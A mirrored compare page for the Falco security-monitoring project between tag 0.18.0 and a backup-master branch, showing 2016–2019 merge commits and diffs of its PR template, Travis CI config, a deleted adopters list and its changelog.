github/falco
1
0
Fork 0
mirror of https://github.com/falcosecurity/falco.git synced 2026-03-20 19:52:08 +00:00
Code Issues Projects Releases Wiki Activity

Compare commits

base: github:0.18.0
Branches Tags
github:master github:fix/buffered_outputs github:fix/http-output-on-non-linux-platforms github:dependabot/submodules/submodules/falcosecurity-rules-048d2f8 github:feat/capture-events-filesize-limits github:update/libs github:3485_webserver_with_own_uid_gid github:release/0.43.x github:ekoops-patch-1 github:release/0.42.x github:release/0.41.x github:test/wip github:new/musl_static_aarch64 github:release/0.40.x github:release/0.39.x github:wip/test_libs_master github:release/0.38.x github:generalize-indexable-ruleset-polymorphic github:chore/test_pr1803 github:LucaGuerra-patch-1 github:release/0.37.x github:fix_CI_5 github:chore/use_actuated_helper github:fix_CI_4 github:bump_falco_latest_libs github:new/static_aarch64 github:fix/use_plugin_name github:new/mode-in-config github:release/0.36.x github:test_filterchecks github:test_release_0.36.0 github:fix/workaround_glibc_bug_timer_delete github:wip/test github:add-load-files-method github:test/ci github:update/pidfile-usage-doc github:bump_libs_andrea github:release/0.35.x github:remove-source-ruleset-overwrite-when-loading github:mstemm-works-with-latest-libs github:test/PR546 github:test/PR959 github:libs_bump github:release/0.34.x github:release/0.34.0 github:fix/kmod_cleanup github:chore/move-rules-to-their-repo github:enable_maintainers_gh_jobs github:dev_docker github:fix/dev_version github:exec-hashes github:falco_modern_probe github:release/0.33.1 github:test_modern_probe github:fix/docker_img_host_root_runtime github:release/0.33.0 github:test_falco_bump github:chore/falco_lock_file github:fix_falco_service github:test_deb_rpm github:buffer_dimension github:testing/falco-0-32-3/issue/1909 github:test/libs/pr/567 github:test/new_libs github:release/0.32.2 github:update/remove-mesos-support github:remove-fntlnz github:test/libs/pr/213 github:leogr-patch-1 github:build/fix-conffiles github:add-app-actions github:add-app-actions-prerebase-2 github:add-grpc-rules-loading github:fix-plugins-issue-56 github:field-properties-changes github:embed-lua-scripts github:new/plugin-system-api-additions-prerebase github:embeddable-falco-engine github:build/apply-libs-pr-41 github:build/upgrade-driver-version-mid2021 github:build/upgrade-driver-version-for-0-29-0 github:build/update-driver-version-wip github:hotfix/grpc-in-packages github:use-url-safe-chars-version github:rules-fp-fixes-2021-02 github:allow-unknown-sources github:libhawk-rules github:build/docs github:update/cli github:update/logo github:caniszczyk-patch-1 github:new/logger github:new/inspect-per-cpu github:new/ci-build-aarch64 github:release/0.26.2 github:temporary/test-ci-broken-tests github:libhawk github:add-exceptions-support-copy2 github:add-exceptions-support-copy github:chore/remove-time-macrodefs github:update/release-drivers github:rules-bash-history-top-only github:fix/scripts-modprobe github:perf-experiments github:fix/1272 github:fix/1272-test github:readme-update github:proposal/rules-engine-version-scope github:nova-debug github:falco-driver-loader-dockerfile github:chore/integration-grpc-with-event-generator github:feat/grpc-integration-tests github:new/profiler github:falco-arm-support github:falco-on-arm github:feature/inputs-mvp github:adding-install-script github:feat/modulecheck github:falco-release-0-17-0 github:falco-release-0-17-1 github:add-addl-pst-owners github:683-handle-sinsp-errors github:allow-regex-chars-rule-names github:backup-master github:add-context-to-rules-errors
github:0.43.0 github:0.43.0-rc4 github:0.43.0-rc3 github:0.43.0-rc2 github:0.43.0-rc1 github:0.42.1 github:0.42.0 github:0.42.0-rc4 github:0.42.0-rc3 github:0.42.0-rc2 github:0.42.0-rc1 github:0.41.3 github:0.41.2 github:0.41.1 github:0.41.1-rc1 github:0.41.0 github:0.41.0-rc2 github:0.41.0-rc1 github:0.40.0 github:0.40.0-rc1 github:0.39.2 github:0.39.1 github:0.39.1-rc1 github:0.39.0 github:0.39.0-rc3 github:0.39.0-rc2 github:0.39.0-rc1 github:0.38.2 github:0.38.2-rc2 github:0.38.2-rc1 github:0.38.1 github:0.38.1-rc1 github:0.38.0 github:0.38.0-rc5 github:0.38.0-rc4 github:0.38.0-rc3 github:0.38.0-rc2 github:0.38.0-rc1 github:0.37.1 github:0.37.1-rc1 github:0.37.0 github:0.37.0-rc3 github:0.37.0-rc2 github:0.37.0-rc1 github:0.36.2 github:0.36.2-rc1 github:0.36.1 github:0.36.1-rc1 github:0.36.0 github:0.36.0-rc3 github:0.36.0-rc2 github:0.36.0-rc1 github:0.35.1 github:0.35.0 github:0.35.0-rc2 github:0.35.0-rc1 github:0.35.0-alpha5 github:0.35.0-alpha4 github:0.35.0-alpha3 github:0.35.0-alpha2 github:0.35.0-alpha1 github:0.34.1 github:0.34.0 github:0.33.1 github:0.33.0 github:0.32.2 github:0.32.1 github:0.32.0 github:0.31.1 github:0.31.0 github:0.30.0 github:0.29.1 github:0.29.0 github:0.28.1 github:0.28.0 github:0.27.0 github:0.26.2 github:0.26.1 github:0.26.0 github:0.25.0 github:0.24.0 github:0.23.0 github:0.22.1 github:0.22.0 github:0.21.0 github:0.20.0 github:0.19.0 github:0.18.0 github:0.17.1 github:0.17.0 github:0.16.0 github:0.15.3 github:0.15.2 github:0.15.1 github:0.15.0 github:0.14.0 github:0.13.1 github:0.13.0 github:agent/0.85.1 github:0.12.1 github:0.12.0 github:agent/0.85.0 github:agent/0.84.2 github:agent/0.84.3 github:agent/0.84.1 github:agent/0.84.0 github:0.11.1 github:0.11.0 github:agent/0.83.1 github:agent/0.83.0 github:agent/0.81.0 github:agent/0.82.0 github:agent/0.80.2 github:agent/0.80.1 github:0.10.0 github:agent/0.80.0 github:agent/0.79.0 github:agent/0.79.1 github:agent/0.78.0 github:agent/0.78.1 github:agent/0.76.4 github:agent/0.77.0 github:agent/0.76.3 github:0.9.0 github:agent/0.76.0 github:agent/0.76.1 github:agent/0.76.2 github:agent/0.75.0 github:agent/0.74.0 github:agent/0.73.2 github:agent/0.73.1 github:agent/0.73.0 github:agent/0.72.4 github:agent/0.72.0 github:agent/0.72.1 github:agent/0.72.2 github:agent/0.72.3 github:agent/0.71.0 github:agent/0.70.0 github:0.8.1 github:0.8.0 github:agent/0.69.0 github:agent/0.68.0 github:agent/0.66.0 github:agent/0.67.0 github:agent/0.65.0 github:agent/0.65.1 github:agent/0.63.0 github:agent/0.63.1 github:agent/0.64.0 github:agent/0.61.0 github:agent/0.62.0 github:0.7.0 github:0.6.1 github:agent/0.60.0 github:agent/0.59.0 github:agent/0.58.0 github:agent/0.57.0 github:agent/0.56.0 github:0.6.0 github:0.6.0-test github:agent/0.55.0 github:agent/0.54.0 github:agent/0.53.0 github:agent/0.52.0 github:agent/0.51.0 github:agent/0.50.1 github:agent/0.50.0 github:0.5.0 github:agent/0.49.1 github:agent/0.49.0 github:agent/0.48.0 github:agent/0.47.0 github:agent/0.46.0 github:agent/0.45.0 github:agent/0.44.0 github:agent/0.43.0 github:0.4.0 github:agent/0.42.0 github:agent/0.40.0 github:agent/0.41.0 github:0.3.0 github:v0.2.0 github:v0.1.0
..
compare: github:backup-master
Branches Tags
github:fix/buffered_outputs github:fix/http-output-on-non-linux-platforms github:dependabot/submodules/submodules/falcosecurity-rules-048d2f8 github:master github:feat/capture-events-filesize-limits github:update/libs github:3485_webserver_with_own_uid_gid github:release/0.43.x github:ekoops-patch-1 github:release/0.42.x github:release/0.41.x github:test/wip github:new/musl_static_aarch64 github:release/0.40.x github:release/0.39.x github:wip/test_libs_master github:release/0.38.x github:generalize-indexable-ruleset-polymorphic github:chore/test_pr1803 github:LucaGuerra-patch-1 github:release/0.37.x github:fix_CI_5 github:chore/use_actuated_helper github:fix_CI_4 github:bump_falco_latest_libs github:new/static_aarch64 github:fix/use_plugin_name github:new/mode-in-config github:release/0.36.x github:test_filterchecks github:test_release_0.36.0 github:fix/workaround_glibc_bug_timer_delete github:wip/test github:add-load-files-method github:test/ci github:update/pidfile-usage-doc github:bump_libs_andrea github:release/0.35.x github:remove-source-ruleset-overwrite-when-loading github:mstemm-works-with-latest-libs github:test/PR546 github:test/PR959 github:libs_bump github:release/0.34.x github:release/0.34.0 github:fix/kmod_cleanup github:chore/move-rules-to-their-repo github:enable_maintainers_gh_jobs github:dev_docker github:fix/dev_version github:exec-hashes github:falco_modern_probe github:release/0.33.1 github:test_modern_probe github:fix/docker_img_host_root_runtime github:release/0.33.0 github:test_falco_bump github:chore/falco_lock_file github:fix_falco_service github:test_deb_rpm github:buffer_dimension github:testing/falco-0-32-3/issue/1909 github:test/libs/pr/567 github:test/new_libs github:release/0.32.2 github:update/remove-mesos-support github:remove-fntlnz github:test/libs/pr/213 github:leogr-patch-1 github:build/fix-conffiles github:add-app-actions github:add-app-actions-prerebase-2 github:add-grpc-rules-loading github:fix-plugins-issue-56 github:field-properties-changes github:embed-lua-scripts github:new/plugin-system-api-additions-prerebase github:embeddable-falco-engine github:build/apply-libs-pr-41 github:build/upgrade-driver-version-mid2021 github:build/upgrade-driver-version-for-0-29-0 github:build/update-driver-version-wip github:hotfix/grpc-in-packages github:use-url-safe-chars-version github:rules-fp-fixes-2021-02 github:allow-unknown-sources github:libhawk-rules github:build/docs github:update/cli github:update/logo github:caniszczyk-patch-1 github:new/logger github:new/inspect-per-cpu github:new/ci-build-aarch64 github:release/0.26.2 github:temporary/test-ci-broken-tests github:libhawk github:add-exceptions-support-copy2 github:add-exceptions-support-copy github:chore/remove-time-macrodefs github:update/release-drivers github:rules-bash-history-top-only github:fix/scripts-modprobe github:perf-experiments github:fix/1272 github:fix/1272-test github:readme-update github:proposal/rules-engine-version-scope github:nova-debug github:falco-driver-loader-dockerfile github:chore/integration-grpc-with-event-generator github:feat/grpc-integration-tests github:new/profiler github:falco-arm-support github:falco-on-arm github:feature/inputs-mvp github:adding-install-script github:feat/modulecheck github:falco-release-0-17-0 github:falco-release-0-17-1 github:add-addl-pst-owners github:683-handle-sinsp-errors github:allow-regex-chars-rule-names github:backup-master github:add-context-to-rules-errors
github:0.43.0 github:0.43.0-rc4 github:0.43.0-rc3 github:0.43.0-rc2 github:0.43.0-rc1 github:0.42.1 github:0.42.0 github:0.42.0-rc4 github:0.42.0-rc3 github:0.42.0-rc2 github:0.42.0-rc1 github:0.41.3 github:0.41.2 github:0.41.1 github:0.41.1-rc1 github:0.41.0 github:0.41.0-rc2 github:0.41.0-rc1 github:0.40.0 github:0.40.0-rc1 github:0.39.2 github:0.39.1 github:0.39.1-rc1 github:0.39.0 github:0.39.0-rc3 github:0.39.0-rc2 github:0.39.0-rc1 github:0.38.2 github:0.38.2-rc2 github:0.38.2-rc1 github:0.38.1 github:0.38.1-rc1 github:0.38.0 github:0.38.0-rc5 github:0.38.0-rc4 github:0.38.0-rc3 github:0.38.0-rc2 github:0.38.0-rc1 github:0.37.1 github:0.37.1-rc1 github:0.37.0 github:0.37.0-rc3 github:0.37.0-rc2 github:0.37.0-rc1 github:0.36.2 github:0.36.2-rc1 github:0.36.1 github:0.36.1-rc1 github:0.36.0 github:0.36.0-rc3 github:0.36.0-rc2 github:0.36.0-rc1 github:0.35.1 github:0.35.0 github:0.35.0-rc2 github:0.35.0-rc1 github:0.35.0-alpha5 github:0.35.0-alpha4 github:0.35.0-alpha3 github:0.35.0-alpha2 github:0.35.0-alpha1 github:0.34.1 github:0.34.0 github:0.33.1 github:0.33.0 github:0.32.2 github:0.32.1 github:0.32.0 github:0.31.1 github:0.31.0 github:0.30.0 github:0.29.1 github:0.29.0 github:0.28.1 github:0.28.0 github:0.27.0 github:0.26.2 github:0.26.1 github:0.26.0 github:0.25.0 github:0.24.0 github:0.23.0 github:0.22.1 github:0.22.0 github:0.21.0 github:0.20.0 github:0.19.0 github:0.18.0 github:0.17.1 github:0.17.0 github:0.16.0 github:0.15.3 github:0.15.2 github:0.15.1 github:0.15.0 github:0.14.0 github:0.13.1 github:0.13.0 github:agent/0.85.1 github:0.12.1 github:0.12.0 github:agent/0.85.0 github:agent/0.84.2 github:agent/0.84.3 github:agent/0.84.1 github:agent/0.84.0 github:0.11.1 github:0.11.0 github:agent/0.83.1 github:agent/0.83.0 github:agent/0.81.0 github:agent/0.82.0 github:agent/0.80.2 github:agent/0.80.1 github:0.10.0 github:agent/0.80.0 github:agent/0.79.0 github:agent/0.79.1 github:agent/0.78.0 github:agent/0.78.1 github:agent/0.76.4 github:agent/0.77.0 github:agent/0.76.3 github:0.9.0 github:agent/0.76.0 github:agent/0.76.1 github:agent/0.76.2 github:agent/0.75.0 github:agent/0.74.0 github:agent/0.73.2 github:agent/0.73.1 github:agent/0.73.0 github:agent/0.72.4 github:agent/0.72.0 github:agent/0.72.1 github:agent/0.72.2 github:agent/0.72.3 github:agent/0.71.0 github:agent/0.70.0 github:0.8.1 github:0.8.0 github:agent/0.69.0 github:agent/0.68.0 github:agent/0.66.0 github:agent/0.67.0 github:agent/0.65.0 github:agent/0.65.1 github:agent/0.63.0 github:agent/0.63.1 github:agent/0.64.0 github:agent/0.61.0 github:agent/0.62.0 github:0.7.0 github:0.6.1 github:agent/0.60.0 github:agent/0.59.0 github:agent/0.58.0 github:agent/0.57.0 github:agent/0.56.0 github:0.6.0 github:0.6.0-test github:agent/0.55.0 github:agent/0.54.0 github:agent/0.53.0 github:agent/0.52.0 github:agent/0.51.0 github:agent/0.50.1 github:agent/0.50.0 github:0.5.0 github:agent/0.49.1 github:agent/0.49.0 github:agent/0.48.0 github:agent/0.47.0 github:agent/0.46.0 github:agent/0.45.0 github:agent/0.44.0 github:agent/0.43.0 github:0.4.0 github:agent/0.42.0 github:agent/0.40.0 github:agent/0.41.0 github:0.3.0 github:v0.2.0 github:v0.1.0

28 Commits
0.18.0 ... backup-mas

Author SHA1 Message Date
Leonardo Di Donato
670736d87e Merge remote-tracking branch 'origin/dev' 2019-07-16 16:20:08 +00:00
Mark Stemm
75b816d806 Merge remote-tracking branch 'origin/dev' 2019-06-12 13:37:56 -07:00
Mark Stemm
194a017d8f Merge remote-tracking branch 'origin/dev' 2019-06-12 09:14:36 -07:00
Mark Stemm
ff376d312b Merge remote-tracking branch 'origin/dev' 2019-06-07 15:15:48 -07:00
Mark Stemm
807c00b827 Merge remote-tracking branch 'origin/dev' 2019-06-07 15:09:50 -07:00
Mark Stemm
db419459aa Merge remote-tracking branch 'origin/dev' 2019-05-13 13:45:34 -07:00
Mark Stemm
36a095ccb3 Merge remote-tracking branch 'origin/dev' 2019-05-13 13:43:10 -07:00
Xiang Dai
f4b0b3c096 falco.yaml: change default program_output action (#507) 
falco-CLA-1.0-signed-off-by: Xiang Dai <764524258@qq.com>1
 2019-02-20 09:18:45 -08:00
Xiang Dai
e546555de8 fix k8s install issue (#506) 
falco-CLA-1.0-signed-off-by: Xiang Dai <764524258@qq.com>
 2019-02-20 09:17:34 -08:00
Xiang Dai
1fb53eefdb Update output (#511) 
falco-CLA-1.0-signed-off-by: Xiang Dai <764524258@qq.com>

Signed-off-by: Xiang Dai <764524258@qq.com>
 2019-02-11 13:01:49 -08:00
Mark Stemm
44e88f28a4 Merge remote-tracking branch 'origin/dev' 2019-02-10 14:57:00 -08:00
Mark Stemm
62c1a0440d Merge remote-tracking branch 'origin/dev' 2019-02-06 16:38:53 -08:00
Mark Stemm
ddf55d3c8e Merge remote-tracking branch 'origin/dev' 2019-01-17 07:28:18 -08:00
Mark Stemm
bd7a9733fd Merge branch 'dev' 2018-11-09 13:41:29 -08:00
Mark Stemm
ff299c1d43 Merge remote-tracking branch 'origin/dev' 2018-09-11 13:33:56 -07:00
Mark Stemm
5e38f130cc Merge remote-tracking branch 'origin/dev' 2018-09-11 11:02:10 -07:00
Mark Stemm
470710366b Merge remote-tracking branch 'origin/dev' 2018-07-31 12:06:09 -07:00
Mark Stemm
6acb13e6bb Merge branch 'dev' 2018-07-24 17:33:24 -07:00
David Archer
b496116fe3 Don't make driver compilation fail when kernel is compiled with CONFIG_ORC_UNWINDER or CONFIG_STACK_VALIDATION. (#362) 
sysdig-CLA-1.0-signed-off-by: David Archer <darcher@gmail.com>
 2018-04-30 14:30:39 -07:00
Mark Stemm
2a0911dcfd Merge branch 'dev' 2018-04-24 16:21:18 -07:00
Mark Stemm
94df00e512 Merge branch 'dev' 2018-01-18 09:07:00 -08:00
Mark Stemm
3ee76637f4 Merge branch 'dev' 2018-01-17 20:30:28 -08:00
Mark Stemm
e8aee19f6c Merge remote-tracking branch 'origin/dev', 0.8.1 2017-10-10 10:49:27 -07:00
Mark Stemm
74556e5f6e Merge branch 'dev' 2017-10-09 17:17:12 -07:00
Mark Stemm
809d20c294 Merge pull request #246 from draios/dev 
Merging for 0.7.0
 2017-05-30 13:30:39 -07:00
Mark Stemm
b0ae29c23a Merge branch 'dev' 2017-05-15 11:12:11 -07:00
Mark Stemm
d1b6b2be87 Merge pull request #229 from draios/dev 
Merging for 0.6.0
 2017-03-29 16:00:06 -07:00
Mark Stemm
e00181d553 Merge pull request #174 from draios/dev 
Merging for 0.5.0
 2016-12-22 13:25:32 -08:00
294 changed files with 1685 additions and 7149 deletions
Expand all files Collapse all files

25
.github/PULL_REQUEST_TEMPLATE.md vendored
View File

@@ -2,8 +2,8 @@
1. If this is your first time, please read our contributor guidelines in the [CONTRIBUTING.md](CONTRIBUTING.md) file and learn how to compile Falco from source [here](https://falco.org/docs/source).
2. Please label this pull request according to what type of issue you are addressing.
3. . Please add a release note!
4. If the PR is unfinished while opening it specify a wip in the title before the actual title, for example, "wip: my awesome feature"
5. Please add a release note!
6. If the PR is unfinished while opening it specify a wip in the title before the actual title, for example, "wip: my awesome feature"
-->
**What type of PR is this?**
@@ -30,31 +30,19 @@
> /kind rule-create
<!--
Please remove the leading whitespace before the `/kind <>` you uncommented.
-->
**Any specific area of the project related to this PR?**
> Uncomment one (or more) `/area <>` lines:
> /area build
> /area engine
> /area examples
> /area rules
> /area deployment
> /area integrations
> /area tests
> /area proposals
<!--
Please remove the leading whitespace before the `/area <>` you uncommented.
-->
> /area examples
**What this PR does / why we need it**:
@@ -75,8 +63,7 @@ Fixes #
<!--
If no, just write "NONE" in the release-note block below.
If yes, a release note is required:
Enter your extended release note in the block below.
If the PR requires additional action from users switching to the new release, prepend the string "action required:".
Enter your extended release note in the block below. If the PR requires additional action from users switching to the new release, prepend the string "action required:".
For example, `action required: change the API interface of the rule engine`.
-->

1
.gitignore vendored
View File

@@ -9,7 +9,6 @@ test/traces-info
test/job-results
test/.phoronix-test-suite
test/results*.json.*
test/build
userspace/falco/lua/re.lua
userspace/falco/lua/lpeg.so

22
.travis.yml
View File

@@ -1,6 +1,7 @@
#
# Copyright (C) 2019 The Falco Authors.
# Copyright (C) 2016-2018 Draios Inc dba Sysdig.
#
# This file is part of falco .
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
@@ -17,9 +18,9 @@
language: cpp
compiler: gcc
env:
- BUILD_TYPE=debug
- BUILD_TYPE=release
dist: xenial
- BUILD_TYPE=Debug
- BUILD_TYPE=Release
sudo: required
services:
- docker
before_install:
@@ -32,4 +33,15 @@ install:
- pushd ../sysdig && (git checkout "${BRANCH}" || exit 0) && echo "Using sysdig branch:" $(git rev-parse --abbrev-ref HEAD) && popd
script:
- mkdir build
- ./scripts/build "${TRAVIS_BUILD_DIR}/.." "${TRAVIS_BUILD_DIR}/build"
- cd build
- docker run --user $(id -u):$(id -g) -v /etc/passwd:/etc/passwd:ro -e MAKE_JOBS=4 -v $TRAVIS_BUILD_DIR/..:/source -v $TRAVIS_BUILD_DIR/build:/build falcosecurity/falco-builder cmake
- docker run --user $(id -u):$(id -g) -v /etc/passwd:/etc/passwd:ro -e MAKE_JOBS=4 -v $TRAVIS_BUILD_DIR/..:/source -v $TRAVIS_BUILD_DIR/build:/build falcosecurity/falco-builder package
- docker run --user $(id -u):$(id -g) -v /etc/passwd:/etc/passwd:ro -e MAKE_JOBS=1 -v $TRAVIS_BUILD_DIR/..:/source -v $TRAVIS_BUILD_DIR/build:/build falcosecurity/falco-builder tests
- docker run -v /boot:/boot:ro -v /var/run/docker.sock:/var/run/docker.sock -v /etc/passwd:/etc/passwd:ro -e MAKE_JOBS=4 -v $TRAVIS_BUILD_DIR/..:/source -v $TRAVIS_BUILD_DIR/build:/build falcosecurity/falco-tester
notifications:
webhooks:
urls:
# - https://webhooks.gitter.im/e/fdbc2356fb0ea2f15033
on_success: change
on_failure: always
on_start: never

17
ADOPTERS.md
View File

@@ -1,17 +0,0 @@
# Adopters
This is a list of production adopters of Falco (in alphabetical order):
* [Booz Allen Hamilton](https://www.boozallen.com/) - BAH leverages Falco as part of their Kubernetes environment to verify that work loads behave as they did in their CD DevSecOps pipelines. BAH offers a solution to internal developers to easily build DevSecOps pipelines for projects. This makes it easy for developers to incorporate Security principles early on in the development cycle. In production, Falco is used to verify that the code the developer ships does not violate any of the production security requirements. BAH [are speaking at Kubecon NA 2019](https://kccncna19.sched.com/event/UaWr/building-reusable-devsecops-pipelines-on-a-secure-kubernetes-platform-steven-terrana-booz-allen-hamilton-michael-ducy-sysdig) on their use of Falco.
* [League](https://league.com/ca/) - League provides health benefits management services to help employees understand and get the most from their benefits, and employers to provide effective, efficient plans. Falco is used to monitor our deployed services on Kubernetes, protecting against malicious access to containerswhich could lead to leaks of PHI or other sensitive data. The Falco alerts are logged in Stackdriver for grouping and further analysis. In the future, we're hoping for integrations with Prometheus and AlertManager as well.
* [Preferral](https://www.preferral.com) - Preferral is a HIPAA-compliant platform for Referral Management and Online Referral Forms. Preferral streamlines the referral process for patients, specialists and their referral partners. By automating the referral process, referring practices spend less time on the phone, manual efforts are eliminated, and patients get the right care from the right specialist. Preferral leverages Falco to provide a Host Intrusion Detection System to meet their HIPPA compliance requirements.
* https://hipaa.preferral.com/01-preferral_hipaa_compliance/
* [Shopify](https://www.shopify.com) - Shopify is the leading multi-channel commerce platform. Merchants use Shopify to design, set up, and manage their stores across multiple sales channels, including mobile, web, social media, marketplaces, brick-and-mortar locations, and pop-up shops. The platform also provides merchants with a powerful back-office and a single view of their business, from payments to shipping. The Shopify platform was engineered for reliability and scale, making enterprise-level technology available to businesses of all sizes. Shopify uses Falco to complement its Host and Network Intrusion Detection Systems.
* [Sumo Logic](https://www.sumologic.com/) - Sumo Logic provides a SaaS based log aggregation service that provides dashboards and applications to easily identify and analyze problems in your application and infrastructure. Sumo Logic provides native integrations for many CNCF projects, such as Falco, that allows end users to easily collect Falco events and analyze Falco events on DecSecOps focused dashboards.
* [Sysdig](https://www.sysdig.com/) Sysdig created Falco in 2016 to detect unexpected or suspicious activity using a rules engine on top of the data that comes from the sysdig kernel system call probe. Sysdig provides tooling to help with vulnerability management, compliance, detection, incident response and forensics in Cloud-native environments. Sysdig Secure has extended falco to include: a rule library, the ability to update macros, lists & rules via the user interface and API, automated tuning of rules, and rule creation based on profiling known system behavior. On top of the basic Falco rules, Sysdig Secure implements the concept of a "Security policy" that can comprise several rules which are evaluated for a user-define infrastructure scope like Kubernetes namespaces, OpenShift clusters, deployment workload, cloud regions etc.

205
CHANGELOG.md
View File

@@ -2,107 +2,11 @@
This file documents all notable changes to Falco. The release numbering uses [semantic versioning](http://semver.org).
## v0.18.0
Released 2019-10-28
### Major Changes
* falco grpc api server implementation, contains a subscribe method to subscribe to outputs from any grpc capable language [[#822](https://github.com/falcosecurity/falco/pull/822)]
* add support for converting k8s pod security policies (psps) into set of falco rules that can be used to evaluate the conditions specified in the psp. [[#826](https://github.com/falcosecurity/falco/pull/826)]
* initial redesign container images to remove build tools and leverage init containers for kernel module delivery. [[#776](https://github.com/falcosecurity/falco/pull/776)]
* add flags to disable `syscall` event source or `k8s_audit` event source [[#779](https://github.com/falcosecurity/falco/pull/779)]
### Minor Changes
* allow for unique names for psp converted rules/macros/lists/rule names as generated by falcoctl 0.0.3 [[#895](https://github.com/falcosecurity/falco/pull/895)]
* make it easier to run regression tests without necessarily using the falco-tester docker image. [[#808](https://github.com/falcosecurity/falco/pull/808)]
* fix falco engine compatibility with older k8s audit rules files. [[#893](https://github.com/falcosecurity/falco/pull/893)]
* add tests for psp conversions with names containing spaces/dashes. [[#899](https://github.com/falcosecurity/falco/pull/899)]
### Bug Fixes
* handle multi-document yaml files when reading rules files. [[#760](https://github.com/falcosecurity/falco/pull/760)]
* improvements to how the webserver handles incoming invalid inputs [[#759](https://github.com/falcosecurity/falco/pull/759)]
* fix: make lua state access thread-safe [[#867](https://github.com/falcosecurity/falco/pull/867)]
* fix compilation on gcc 5.4 by working around gcc bug https://gcc.gnu.org/bugzilla/show_bug.cgi?id=56480 [[#873](https://github.com/falcosecurity/falco/pull/873)]
* add explicit dependency between tests and catch2 header file. [[#879](https://github.com/falcosecurity/falco/pull/879)]
* fix: stable dockerfile libgcc-6-dev dependencies [[#830](https://github.com/falcosecurity/falco/pull/830)]
* fix: build dependencies for the local dockerfile [[#782](https://github.com/falcosecurity/falco/pull/782)]
* fix: a crash bug that could result from reading more than ~6 rules files [[#906](https://github.com/falcosecurity/falco/issues/906)] [[#907](https://github.com/falcosecurity/falco/pull/907)]
### Rule Changes
* rules: add calico/node to trusted privileged container list [[#902](https://github.com/falcosecurity/falco/pull/902)]
* rules: add macro `calico_node_write_envvars` to exception list of write below etc [[#902](https://github.com/falcosecurity/falco/pull/902)]
* rules: add exception for rule write below rpm, this is a fp caused by amazon linux 2 yum. [[#755](https://github.com/falcosecurity/falco/pull/755)]
* rules: ignore sensitive mounts from the ecs-agent [[#881](https://github.com/falcosecurity/falco/pull/881)]
* rules: add rules to detect crypto mining activities [[#763](https://github.com/falcosecurity/falco/pull/763)]
* rules: add back rule delete bash history for backport compatibility [[#864](https://github.com/falcosecurity/falco/pull/864)]
* rule: syscalls are used to detect suid and sgid [[#765](https://github.com/falcosecurity/falco/pull/765)]
* rules: delete bash history is renamed to delete or rename shell history [[#762](https://github.com/falcosecurity/falco/pull/762)]
* rules: add image fluent/fluentd-kubernetes-daemonset to clear log trusted images [[#852](https://github.com/falcosecurity/falco/pull/852)]
* rules: include default users created by `kops`. [[#898](https://github.com/falcosecurity/falco/pull/898)]
* rules: delete or rename shell history: when deleting a shell history file now the syscalls are taken into account rather than just the commands deleting the files [[#762](https://github.com/falcosecurity/falco/pull/762)]
* rules: delete or rename shell history: history deletion now supports fish and zsh in addition to bash [[#762](https://github.com/falcosecurity/falco/pull/762)]
* rules: "create hidden files or directories" and "update package repository" now trigger also if the files are moved and not just if modified or created. [[#766](https://github.com/falcosecurity/falco/pull/766)]
## v0.17.1
Released 2019-09-26
### Major Changes
* Same as v0.17.0
##
* Same as v0.17.0
### Bug Fixes
* All in v0.17.0
* Fix a build problem for pre-built kernel probes. [[draios/sysdig#1471](https://github.com/draios/sysdig/pull/1471)]
### Rule Changes
* Same as v0.17.0
## v0.17.0
Released 2019-07-31
### Major Changes
* **The set of supported platforms has changed**. Switch to a reorganized builder image that uses Centos 7 as a base. As a result, falco is no longer supported on Centos 6. The other supported platforms should remain the same [[#719](https://github.com/falcosecurity/falco/pull/719)]
### Minor Changes
* When enabling rules within the falco engine, use rule substrings instead of regexes. [[#743](https://github.com/falcosecurity/falco/pull/743)]
* Additional improvements to the handling and display of rules validation errors [[#744](https://github.com/falcosecurity/falco/pull/744)] [[#747](https://github.com/falcosecurity/falco/pull/747)]
### Bug Fixes
* Fix a problem that would cause prevent container metadata lookups when falco was daemonized [[#731](https://github.com/falcosecurity/falco/pull/731)]
* Allow rule priorites to be expressed as lowercase and a mix of lower/uppercase [[#737](https://github.com/falcosecurity/falco/pull/737)]
### Rule Changes
* Fix a parentheses bug with the `shell_procs` macro [[#728](https://github.com/falcosecurity/falco/pull/728)]
* Allow additional containers to mount sensitive host paths [[#733](https://github.com/falcosecurity/falco/pull/733)] [[#736](https://github.com/falcosecurity/falco/pull/736)]
* Allow additional containers to truncate log files [[#733](https://github.com/falcosecurity/falco/pull/733)]
* Fix false positives with the `Write below root` rule on GKE [[#739](https://github.com/falcosecurity/falco/pull/739)]
## v0.16.0
Released 2019-07-12
### Major Changes
## Major Changes
* Clean up error reporting to provide more meaningful error messages along with context when loading rules files. When run with -V, the results of the validation ("OK" or error message) are sent to standard output. [[#708](https://github.com/falcosecurity/falco/pull/708)]
@@ -112,7 +16,7 @@ Released 2019-07-12
* Add Catch2 as a unit testing framework. This will add additional coverage on top of the regression tests using Avocado. [[#687](https://github.com/falcosecurity/falco/pull/687)]
### Minor Changes
## Minor Changes
* Add SYSDIG_DIR Cmake option to specify location for sysdig source code when building falco. [[#677](https://github.com/falcosecurity/falco/pull/677)] [[#679](https://github.com/falcosecurity/falco/pull/679)] [[#702](https://github.com/falcosecurity/falco/pull/702)]
@@ -132,7 +36,7 @@ Released 2019-07-12
* Fix PR template for kind/rule-*. [[#697](https://github.com/falcosecurity/falco/pull/697)]
### Bug Fixes
## Bug Fixes
* Remove an unused cmake file. [[#700](https://github.com/falcosecurity/falco/pull/700)]
@@ -140,7 +44,7 @@ Released 2019-07-12
* Misc k8s install docs improvements. [[#671](https://github.com/falcosecurity/falco/pull/671)]
### Rule Changes
## Rule Changes
* Allow k8s.gcr.io/kube-proxy image to run privileged. [[#717](https://github.com/falcosecurity/falco/pull/717)]
@@ -170,19 +74,19 @@ Released 2019-07-12
Released 2019-06-12
### Major Changes
## Major Changes
* None.
### Minor Changes
## Minor Changes
* None.
### Bug Fixes
## Bug Fixes
* Fix kernel module compilation for kernels < 3.11 [[#sysdig/1436](https://github.com/draios/sysdig/pull/1436)]
### Rule Changes
## Rule Changes
* None.
@@ -190,19 +94,19 @@ Released 2019-06-12
Released 2019-06-12
### Major Changes
## Major Changes
* New documentation and process handling around issues and pull requests. [[#644](https://github.com/falcosecurity/falco/pull/644)] [[#659](https://github.com/falcosecurity/falco/pull/659)] [[#664](https://github.com/falcosecurity/falco/pull/664)] [[#665](https://github.com/falcosecurity/falco/pull/665)]
### Minor Changes
## Minor Changes
* None.
### Bug Fixes
## Bug Fixes
* Fix compilation of eBPF programs on COS (used by GKE) [[#sysdig/1431](https://github.com/draios/sysdig/pull/1431)]
### Rule Changes
